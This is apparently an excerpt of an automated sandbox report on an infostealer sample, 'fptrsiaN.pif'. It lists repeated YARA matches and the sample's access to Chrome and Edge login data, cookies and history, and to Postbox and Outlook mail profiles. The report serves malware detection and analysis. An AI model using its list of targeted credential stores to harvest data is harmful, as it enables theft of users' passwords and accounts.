          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\Libraries\fptrsiaN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029C8BB0 GetLocalTime,1_2_029C8BB0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029CB0B0 GetVersionExA,1_2_029CB0B0
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTR
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3000201227.000000001D40F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3001487610.0000000021EEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTR
          Source: C:\Users\Public\Libraries\fptrsiaN.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\Public\Libraries\fptrsiaN.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\Public\Libraries\fptrsiaN.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\Public\Libraries\fptrsiaN.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\Public\Libraries\fptrsiaN.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\Public\Libraries\fptrsiaN.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\Public\Libraries\fptrsiaN.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
          Source: C:\Users\Public\Libraries\fptrsiaN.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\Public\Libraries\fptrsiaN.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\Public\Libraries\fptrsiaN.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\Public\Libraries\fptrsiaN.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
